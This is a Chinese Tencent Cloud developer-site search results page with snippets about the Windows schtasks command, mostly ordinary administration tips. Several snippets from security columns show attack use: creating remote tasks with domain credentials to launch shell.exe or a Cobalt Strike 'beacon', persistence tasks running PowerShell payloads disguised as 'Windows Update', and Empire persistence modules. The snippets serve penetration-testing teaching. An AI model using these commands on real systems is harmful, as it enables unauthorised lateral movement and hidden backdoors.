- 综合排序
- 最热优先
- 最新优先
- 来自专栏全栈程序员必看
windows定时任务schtasks命令详细解
SCHTASKS /Create [/S system [/U username [/P [password]]]] [/RU username [/RP password]] /SC schedule /U username 指定应在其中执行 SchTasks.exe 的用户上下文。 /P [password] 指定给定用户上下文的密码。 SCHTASKS /Create /S ABC /U domain\user /P password /SC MINUTE /MO 5 /TN accountant / SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN gametime /TR c:\windows\system32\ SCHTASKS /Create /S ABC /U domain\user /P password /SC MINUTE /MO 5 /TN logtracker
3.6K10编辑于 2022-07-21 - 来自专栏有困难要上,没有困难创造困难也要上!
Windows通过schtasks设置开机自启动脚本
> c:\test\test.log echo %COMPUTERNAME% >> c:\test\test.log echo %USERNAME% >> c:\test\test.log 创建任务 schtasks.exe /create /tn "init" /ru SYSTEM /sc ONSTART /tr "C:\test\init.bat" 删除任务 schtasks /delete /tn init 查询任务 schtasks /query /fo TABLE schtasks /query /fo TABLE /tn init schtasks /query /fo LIST schtasks /query /fo LIST /tn init 手动运行任务 schtasks /run /tn init
2.5K40发布于 2018-06-12 - 来自专栏软测小生
自动化测试之Windows计划定时任务命令schtasks及语法
/u User /p 密码 ) schtasks run 立即运行计划任务。 schtasks /run /tn "Security Script" 作为响应,SchTasks.exe 启动与任务相关联的脚本并显示以下消息: SUCCESS: Attempted 在远程计算机上运行任务 以下命令用于在远程计算机 Svr01 上启动 Update 任务:schtasks /run /tn Update /s Svr01 在这种情况下,SchTasks.exe 显示以下错误消息 正如消息提示的那样,Schtasks 尝试启动程序,但它无法验证该程序实际上已经启动。 schtasks end 停止由任务启动的程序。 示例 终止本地计算机上的任务 以下命令用于终止由 My Notepad 任务启动的 Notepad.exe 实例: schtasks /end /tn "My Notepad" 作为响应,SchTasks.exe
5.5K40发布于 2019-07-05 - 来自专栏Windows技术交流
计划任务定时重启服务或重启机器
添加一个每隔一段时间就重启服务的计划任务,一句命令搞定计划任务添加 例如 ①每天2点触发后、每隔120分钟(2小时)重启一次远程服务 schtasks.exe /CREATE /ru system /rl " /enable schtasks /run /tn "\restart_computer" 【每天16点定时执行重启】英文时间格式 schtasks.exe /CREATE /ru system /tn "\restart_computer" /ru SYSTEM /st 16:00 /sd 01/01/1900 schtasks /change /tn "\restart_computer" /enable schtasks /run /tn "\restart_computer" 【每隔5分钟执行一次重启】中文时间格式 schtasks.exe /CREATE /ru system -r -t 0" /f schtasks /change /tn "\restart_computer" /ru SYSTEM /st 00:00 /sd 01/01/1900 schtasks /change
4.4K60编辑于 2024-09-06 - 来自专栏Windows技术交流
如何通过命令调整GPU云服务器VNC多显示器设置为仅在1上显示
\DISPLAY2" /f schtasks.exe /run /tn enable_display1 schtasks.exe /run /tn disable_display2 #仅在2显示(腾讯云控制台 \DISPLAY1" /f schtasks.exe /run /tn enable_display2 schtasks.exe /run /tn disable_display1 【扩展:1为主】 \DISPLAY1" /f schtasks.exe /run /tn enable_display1 schtasks.exe /run /tn enable_display2 schtasks.exe \DISPLAY2" /f schtasks.exe /run /tn enable_display2 schtasks.exe /run /tn enable_display1 schtasks.exe \DISPLAY1" /f #schtasks /change /tn "enable_display1" /st 00:00 /sd 1900/01/01 schtasks.exe /create
2.3K10编辑于 2025-06-18 - 来自专栏漏洞知识库
内网渗透之命令行渗透 - 渗透红队笔记
---- 计划任务执行命令 schtasks(计划任务)语法 # 一、执行bat schtasks /create /tn task1 /U 域\域用户 /P 域用户密码 /tr 执行的命令或者bat路径 /sc ONSTART /s 域机器IP /RU system # 二、运行 schtasks /run /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码 # 三、删除计划任务 schtasks /F /delete /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码 /RU system :立即执行,以system权限执行 # 域用户 schtasks \1.bat /sc ONSTART /s 192.168.1.1 /RU system schtasks /run /tn task1 /s 192.168.1.1 /U a\username /P password schtasks /F /delete /tn task1 /s 192.168.1.1 /U a\username /P password schtasks(计划任务)实例 我先在本地创建一个
2.4K30发布于 2020-11-25 - 来自专栏全栈工程师修炼之路
Win系统任务计划命令一览表
补充知识 at命令与与schtasks的区别是什么? 如果是XP系统用schtasks命令不能在前台处理,反而用at命令加上/interactive参数到可以在前台执行。 注意事项: WIN7及以上不能用这个命令.如果要求WIN7执行交互式任务,则使用 schtasks.exe 实用程序(使用 “schtasks /?” FO LIST /V /S system /U user /P password SCHTASKS /query /FO LIST /v SCHTASKS /Query /FO TABLE /NH /V schtasks /query /s Reskit16 /fo csv /nh >> \\svr01\data\tasklogs\p0102.csv #作为响应,SchTasks.exe 会把为计算机 SCHTASKS /delete /TN doc SCHTASKS /delete /TN \{9D2AB7EB-215E-4806-8B4A-7F231CE61D78} WeiyiGeek.
3K10编辑于 2022-09-28 - 来自专栏全栈工程师修炼之路
Win系统任务计划命令一览表
补充知识 at命令与与schtasks的区别是什么? 如果是XP系统用schtasks命令不能在前台处理,反而用at命令加上/interactive参数到可以在前台执行。 注意事项: WIN7及以上不能用这个命令.如果要求WIN7执行交互式任务,则使用 schtasks.exe 实用程序(使用 “schtasks /?” FO LIST /V /S system /U user /P password SCHTASKS /query /FO LIST /v SCHTASKS /Query /FO TABLE /NH /V schtasks /query /s Reskit16 /fo csv /nh >> \\svr01\data\tasklogs\p0102.csv #作为响应,SchTasks.exe 会把为计算机 SCHTASKS /delete /TN doc SCHTASKS /delete /TN \{9D2AB7EB-215E-4806-8B4A-7F231CE61D78} ? WeiyiGeek.
2.5K21发布于 2020-10-26 - 来自专栏红蓝对抗
横向移动-IPC
在windows server 2012及以后的操作系统已经弃用了at命令,转而使用schtasks命令,schtasks命令比at命令更加的灵活,但是在使用schtasks命令时,就会在系统中留下日志文件 命令,schtasks命令与at命令不同,schtasks命令为先创建一个任务,然后再按需运行该任务,也可直接指定时间运行,但相对来说较于麻烦,所以这里使用按需运行任务,在创建了任务后直接让其运行即可 ,每天运行一次 schtasks /run /s 192.168.3.32 /tn beacon /i # 运行beacon服务 这里可以通过schtasks命令去查看当前计划任务情况,和删除计划任务 ,具体命令如下 schtasks /query | findstr beacon # 查看beacon计划任务 schtasks /delete /s 192.168.3.32 /tn beacon / f # 删除beacon计划任务 这里,使用schtasks也成功将SQLserver上线。
2.6K80编辑于 2023-02-28 - 来自专栏Windows技术交流
低版本Windows系统在部分机型的云服务器上启动速度慢且概率性存在自动注销问题
/change /tn "\stop_procmon" /ru Administrator /rp "管理员密码" /st 00:00 /sd 1900/01/01 schtasks /change Administrator计划任务 schtasks.exe /create /tn "\start_w32time" /ru Administrator /rp "管理员密码" /rl highest /sc ONSTART /tr "c:\windows\system32\sc.exe start w32time" /f schtasks /change /tn "\start_w32time" /change /tn "\stop_procmon" /ru Administrator /rp "管理员密码" /st 00:00 /sd 1900/01/01 schtasks /change /tn "\stop_procmon" /Disable schtasks.exe /create /tn "\start_w32time" /ru Administrator /rp "管理员密码"
67600编辑于 2024-06-05 - 来自专栏信安之路
利用计划任务维持系统权限
LHOST 10.0.2.21 set target 5 exploit 在 cmd 下执行 schtask 来创建计划任务,在用户登录系统时,执行生成好的 Powershell 的 padyload: schtasks 也可以在空闲时间进行执行,命令如下: #(X64) - On System Start schtasks /create /tn PentestLab /tr "c:\windows\syswow64\ 然后创建一个调度任务,当关联的事件 ID 出现时,触发任务执行: schtasks /Create /TN OnLogOff /TR C:\tmp\pentestlab.exe /SC ONEVENT 使用 Query 参数可以查看创建的任务计划: schtasks /Query /tn OnLogOff /fo List /v ? 当管理员登出系统时,触发任务执行: ? Payload 会以 base64 编码的格式保存在注册表中,还有个模块可以在用户登录期间执行 Payload: usemodule persistence/elevated/schtasks* set
1.4K30发布于 2021-05-27 - 来自专栏一个爱瞎折腾的程序猿
使用批处理脚本愉快的清理缓存
Delete /TN "%planName%" /F>>%execbat% REM 任务时间 设置一个过期时间,但是立即执行 set tasktime="00:00" echo 在远程主机创建计划任务 SCHTASKS P "%ycpwd%" /SC ONCE /ST %tasktime% /TN %planName% /TR %taskPath% /RU %ycname% /F echo 立即执行定义的计划任务 SCHTASKS .txt>%execbat% REM ....重启IIS echo iisreset>>%execbat% REM ....删除计划任务 echo yes| 始终确认 echo echo yes^| SCHTASKS /Delete /TN "%planName%" /F>>%execbat% REM 任务时间延迟 set tasktime="00:00" echo 在远程主机创建计划任务 SCHTASKS / /Run /S %主机地址% /U %主机地址%\%主机登陆名% /P "%密码%" /I /TN "%计划任务名%" 删除任务:SCHTASKS /Run /S %主机地址% /U %主机地址%\
1.9K10发布于 2018-09-14 - 来自专栏Windows技术交流
如何重启远程服务
article/1871411 如何修改远程端口号,参考https://cloud.tencent.com/developer/article/1557774 建议搞个定期重启远程服务的计划任务,可以用schtasks 命令创建, 参考 https://www.robvanderwoude.com/schtasks.php https://docs.microsoft.com/en-us/windows/win32/taskschd /schtasks https://github.com/MicrosoftDocs/windowsserverdocs/blob/main/WindowsServerDocs/administration /windows-commands/schtasks-create.md 添加一个每隔一段时间就重启机器的计划任务,一句命令搞定计划任务添加 例如如果重启机器,建议设置凌晨定时重启,例如: 每天2点触发后 、每隔1439分钟(23小时59分)重启一次机器 schtasks.exe /CREATE /ru system /rl highest /SC DAILY /MO 1 /TN restart_computer
7.5K20编辑于 2025-08-11 - 来自专栏Bypass
利用计划任务进行权限维持的几种姿势
原文地址:https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/ Windows操作系统提供了一个实用程序(schtasks.exe #(X64) - On System Start schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0 “schtasks”实用程序提供了必要的选项,因为它是其功能的一部分。 schtasks /Query /tn OnLogOff /fo List /v ? 查询计划任务 当用户管理员注销时,将创建事件ID,并在下次登录时执行有效负载。 ? usemodule persistence/elevated/schtasks*set Listener http ?
3.3K20发布于 2019-11-07 - 来自专栏网络安全攻防
IPC$横向移动
之前版本的操作系统中,使用at命令在远程目标主机上创建计划任务的流程大致如下: 使用net time命令确定远程机器的当前时间 使用copy命令将payload文件复制到远程目标机器中 使用at/schtasks 命令启动该payload文件 删除使用at/schtasks命令创建计划任务的记录 在使用at命令在远程机器上创建计划任务之前,还需要使用net use命令建立IPC$,下面对上面的过程做一个简单的演示 命令创建计划任务 使用at命令让目标主机在指定的时间(22:22)运行一个程序: #创建一个在22:22运行的计划任务 schtasks /create /tn "test" /tr c:\shell.exe @#$" #创建计划任务之后,如果时间间隔太长不想等,可以立即运行后门程序 schtasks /run /tn "test" /s 193.168.188.140 /u administrator 命令时会在系统中留下日志文件C:\windows\tasks\schedlgu.txt,如果只选schtasks命令后没有回显,可以配置ipc
5.8K30编辑于 2022-12-22 - 来自专栏Ms08067安全实验室
通过计划任务实现持续性攻击
Windows操作系统中提供了一个实用工具schtasks.exe,系统管理可以使用该工具完成在指定日期和时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性攻击。 #(X64) - On System Start schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\ schtasks /CREATE /TN "Windows Update" /TR "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe 图*-* 持续性攻击-计划任务事件ID “Query”参数可用于检索新创建的计划任务的信息:schtasks /Query /tn OnLogOff /fo List /v ? usemodule persistence/elevated/schtasks* set Listener http ?
1.5K30发布于 2020-11-11 - 来自专栏Ms08067安全实验室
CobalStrike批量上线后的权限维持和信息收集~
维稳方法一:加入出册表自启动 之所以放入注册表中,是由于我们后期的操作可能需要一个正常用户权限的shell,因为有些操作必须在对应的用户权限下才能正常进行,比如wmi,schtasks,net user 维稳方法三:Windows的计划任务(schtasks) 简介: 计划任务,顾名思义,指定时间做指定的事情,对windows来说可能是执行脚本,也可能是exe。 在win7后的版本就有了个新的功能,schtasks计划任务: ? 比如我要在十点后启用这个这个后门。 schtasks/create /tn "360"/trC:\Windows\Temp\360.exe /sc DAILY /st 10:00 /tn任务名(自定义)/tr目录,也可以是执行的命令 schtasks /query /tn 360/v schtasks /query|findstr "360" #查询创建的任务 schtasks/run /tn 360 #立即运行创建的任务 schtasks
2.2K30发布于 2021-01-13 - 来自专栏Windows技术交流
通过winrm、自动化助手tat无法达到在系统内部执行命令的效果时,可以尝试这种办法
doubleclick.bat,然后创建计划任务调用这个.bat即可 #如果是自动化助手TAT下发指令,建议指定用户级别为Administrator,如果是默认的SYSTEM用户级别,一些命令的参数格式可能会有出入 schtasks.exe Windows\doubleclick.bat" /ru Administrator /rl highest /sc ONLOGON /tr "cmd.exe /c D:\doubleclick.bat" /f schtasks change /tn "\Microsoft\Windows\doubleclick.bat" /st 00:00 /sd 1900/01/01 /ru Administrator /rp "密码" schtasks /run /tn "\Microsoft\Windows\doubleclick.bat" schtasks /change /tn "\Microsoft\Windows\doubleclick.bat " /DISABLE schtasks /delete /tn "\Microsoft\Windows\doubleclick.bat"
65210编辑于 2024-03-12 - 来自专栏Windows技术交流
远程win10经常卡在登录界面,可以设置计划任务间隔一段时间就重启远程服务
restart_rdp_service /TR "powershell.exe -c '& {restart-service termservice -force}'" /ST 02:00 /RI 120 /DU 24:00 /f schtasks /change /tn "restart_rdp_service" /st 00:00 /sd 1900/01/01 ②每天2点触发后、每隔1439分钟(23小时59分)重启一次远程服务 schtasks.exe /TR "powershell.exe -c '& {restart-service termservice -force}'" /ST 02:00 /RI 1439 /DU 24:00 /f schtasks restart_rdp_service" /st 00:00 /sd 1900/01/01 如果重启机器,建议设置凌晨定时重启,例如: 每天2点触发后、每隔1439分钟(23小时59分)重启一次机器 schtasks.exe highest /SC DAILY /MO 1 /TN restart_computer /TR "shutdown -r -t 0" /ST 02:00 /RI 1439 /DU 24:00 /f schtasks
2.5K31编辑于 2023-07-15 - 来自专栏Bypass
三大渗透框架权限维持
elevated(管理权限) misc(杂项) powerbreach(内存维持) userland(用户权限) registry* add_netuser deaduser backdoor_lnk schtasks * add_sid_history* eventlog* registry wmi* debugger* resolver schtasks wmi_updater* disable_machine_acct_change 计划任务 (Empire: agents) > interact 9NZ2RWBC(Empire: 9NZ2RWBC) > usemodule persistence/elevated/schtasks *(Empire: powershell/persistence/elevated/schtasks) > set Listener test(Empire: powershell/persistence /elevated/schtasks) > set DailyTime 22:50(Empire: powershell/persistence/elevated/schtasks) > execute
1.4K30发布于 2019-10-03
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号